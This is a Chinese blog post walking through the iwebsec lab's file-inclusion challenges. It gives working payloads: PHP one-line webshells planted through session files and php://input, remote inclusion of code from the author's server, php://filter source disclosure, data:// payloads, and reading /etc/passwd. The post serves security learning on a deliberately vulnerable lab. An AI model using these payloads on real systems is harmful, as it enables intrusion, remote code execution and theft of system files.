<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="iwebsec_文件包含漏洞"><meta name="keywords" content=""><meta name="author" content="Lxy"><meta name="copyright" content="Lxy"><title>iwebsec_文件包含漏洞 | SECURITY | 米线Lxy</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '7.1.1'
} </script><meta name="generator" content="Hexo 7.1.1"></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#01-%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">1.</span> <span class="toc-text">01-本地文件包含</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#02-%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%BB%95%E8%BF%87"><span class="toc-number">2.</span> <span class="toc-text">02-本地文件包含绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#03-session%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">3.</span> <span class="toc-text">03-session本地文件包含</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#04-%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">4.</span> <span class="toc-text">04-远程文件包含</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#05-%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%BB%95%E8%BF%87"><span class="toc-number">5.</span> <span class="toc-text">05-远程文件包含绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#06-php%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">6.</span> <span class="toc-text">06-php伪协议</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0708-php-input%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">7.</span> <span class="toc-text">0708-php:&#x2F;&#x2F;input伪协议</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#09-file-%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%88%A9%E7%94%A8"><span class="toc-number">8.</span> <span class="toc-text">09-file:&#x2F;&#x2F;伪协议利用</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#10-data-%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%88%A9%E7%94%A8"><span class="toc-number">9.</span> <span class="toc-text">10-data:&#x2F;&#x2F;伪协议利用</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Lxy</div><div class="author-info__description text-center">很高兴我们在此相遇！</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">4</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">SECURITY | 米线Lxy</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">iwebsec_文件包含漏洞</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2024-04-15</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h4 id="01-本地文件包含"><a href="#01-本地文件包含" class="headerlink" title="01-本地文件包含"></a>01-本地文件包含</h4><p>答案都给出了</p>
<h4 id="02-本地文件包含绕过"><a href="#02-本地文件包含绕过" class="headerlink" title="02-本地文件包含绕过"></a>02-本地文件包含绕过</h4><p>答案也给出了，意思是想让我们使用<code>%00</code>进行截断绕过文件后缀检测，先传参<code>?filename=test.txt</code>，给我们回显的错误中可以看到<code>**Failed opening &#39;test.txt.html&#39;**</code>这样一句话，所以后台其实是在我们的文件名的后面加了<code>.html</code>后缀，使用<code>%00</code>截断即可</p>
<h4 id="03-session本地文件包含"><a href="#03-session本地文件包含" class="headerlink" title="03-session本地文件包含"></a>03-session本地文件包含</h4><p>先按照提示发一个正常包，发现会把我们上传的内容当作<code>SESSION[&#39;username&#39;]</code>的值，那我们可以上传木马，如何再去包含session文件即可</p>
<p><code>?iwebsec=&lt;?php%20eval($_POST[a]);?&gt;</code></p>
<p>本题没有文件包含的地方，用第一题的就行，一般的session文件保存的地址是<code>/var/log/php/session/sess_PHPSESSID</code>，其中<code>PHPSESSID</code>是第三题的</p>
<p>在第一题的传参</p>
<p><code>?filename=/var/lib/php/session/sess_odrfbdgrftso83fl9s7mfuq1i7</code></p>
<p>POST<code>a=system(ls);</code></p>
<h4 id="04-远程文件包含"><a href="#04-远程文件包含" class="headerlink" title="04-远程文件包含"></a>04-远程文件包含</h4><p>文件包含中可以包含远程文件，也就是说如果你自己有公网IP的服务器的话，在服务器上放一个文件，通过URL去包含该文件即可</p>
<p>我在我的服务器中创建一个test.txt的文件，内容为<code>&lt;?php phpinfo();?&gt;</code></p>
<p><img src="/pic/image-20240415100032652.png" alt="image-20240415100032652"></p>
<p>接着我包含这个文件<code>?filename=http://8.130.../test.txt</code></p>
<p>结果如下：</p>
<img src="/pic/image-20240415100113604.png" alt="image-20240415100113604" style="zoom:80%;" />



<h4 id="05-远程文件包含绕过"><a href="#05-远程文件包含绕过" class="headerlink" title="05-远程文件包含绕过"></a>05-远程文件包含绕过</h4><p>使用<code>%00</code>或者<code>%23</code>都行，<code>%23</code>是<code>#</code>的编码</p>
<h4 id="06-php伪协议"><a href="#06-php伪协议" class="headerlink" title="06-php伪协议"></a>06-php伪协议</h4><p><code>?filename=php://filter/convert.base64-encode/resource=06.php</code></p>
<p>去学伪协议就行，最基础的用法了，得到的是经过<code>base64</code>编码的文件内容，拿去解码就行</p>
<h4 id="0708-php-input伪协议"><a href="#0708-php-input伪协议" class="headerlink" title="0708-php:&#x2F;&#x2F;input伪协议"></a>0708-php:&#x2F;&#x2F;input伪协议</h4><p>该协议会将<code>POST</code>的内容作为需要包含的文件内容，只需要<code>POST</code>木马即可</p>
<p>GET<code>?filename=php://input</code></p>
<p>POST<code>&lt;?php eval($_GET[f]);?&gt;</code></p>
<h4 id="09-file-伪协议利用"><a href="#09-file-伪协议利用" class="headerlink" title="09-file:&#x2F;&#x2F;伪协议利用"></a>09-file:&#x2F;&#x2F;伪协议利用</h4><p>根据提示，我们看看是什么意思<code>file:///etc/passwd</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">`file:///etc/passwd` 是一个 URL 地址，指向 Unix/Linux 系统中的 `/etc/passwd` 文件。在 Unix 和类Unix系统中，`/etc/passwd` 文件通常用于存储用户账户信息。</span><br><span class="line"></span><br><span class="line">下面是关于 `/etc/passwd` 文件的一些解释：</span><br><span class="line"></span><br><span class="line">1. **文件位置**：</span><br><span class="line">   - 在 Unix/Linux 系统中，`/etc/passwd` 文件通常位于根目录下的 `/etc` 目录中。</span><br><span class="line">   </span><br><span class="line">2. **文件内容**：</span><br><span class="line">   - `/etc/passwd` 文件包含了系统上所有用户账户的基本信息，每行代表一个用户账户。</span><br><span class="line">   - 每行由多个字段组成，这些字段包括用户名、加密后的密码（通常是 `x` 或 `*`，实际密码保存在 `/etc/shadow` 文件中）、用户 ID、组 ID、用户描述信息、家目录路径和登录 shell 路径等。</span><br><span class="line">   </span><br><span class="line">3. **权限**：</span><br><span class="line">   - 由于 `/etc/passwd` 文件存储了有关系统用户的敏感信息，因此对其访问权限受到严格控制，只有特定的用户或进程才能读取该文件。</span><br><span class="line">   - 通常情况下，普通用户无法直接查看 `/etc/passwd` 文件的内容。</span><br><span class="line"></span><br><span class="line">4. **安全性**：</span><br><span class="line">   - 需要注意的是，直接暴露 `/etc/passwd` 文件可能会导致安全风险，因为其中包含了部分用户账户的信息，如用户名等。因此，在生产环境中应当谨慎处理此类敏感文件，并确保适当的安全措施。</span><br><span class="line"></span><br><span class="line">总之，`file:///etc/passwd` 可以被视为一个指向系统中用户账户信息所在文件的 URL 地址，但需要小心处理，避免泄露敏感信息。</span><br></pre></td></tr></table></figure>

<p><code>file</code>协议读的是本地文件，使用的是绝对路径，通过这个我们可以去读取一些已知路径的文件</p>
<h4 id="10-data-伪协议利用"><a href="#10-data-伪协议利用" class="headerlink" title="10-data:&#x2F;&#x2F;伪协议利用"></a>10-data:&#x2F;&#x2F;伪协议利用</h4><p><code>data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b</code></p>
<p>这个的意思是文件类型是<code>text/plain</code>，文件的内容是经过<code>base64</code>编码后的<code>PD9waHAgcGhwaW5mbygpOz8%2b</code>,这个解码后是<code>&lt;?php phpinfo();?</code></p>
<p>还有很多用法，自行查询</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Lxy</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://lxy00.top/2024/04/15/iwebsec_文件包含漏洞/">http://lxy00.top/2024/04/15/iwebsec_文件包含漏洞/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://lxy00.top">SECURITY | 米线Lxy</a>！</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="next-post pull-right"><a href="/2024/04/15/iwebsec_upload/"><span>iwebsec_upload</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = 'false' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'Bnr1wLZ3jY69sAXABKBTt5TO-gzGzoHsz',
  appKey:'loLNR3sesNkuhCMjtzlb2g1d',
  placeholder:'请你不要 diss 我',
  avatar:'monsterid',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2022 - 2024 By Lxy</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">Hi, welcome to my <a target="_blank" rel="noopener" href="https://github.com/Yllxx03">Github</a>!</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.1"></script><script src="/js/fancybox.js?version=1.9.1"></script><script src="/js/sidebar.js?version=1.9.1"></script><script src="/js/copy.js?version=1.9.1"></script><script src="/js/fireworks.js?version=1.9.1"></script><script src="/js/transition.js?version=1.9.1"></script><script src="/js/scroll.js?version=1.9.1"></script><script src="/js/head.js?version=1.9.1"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>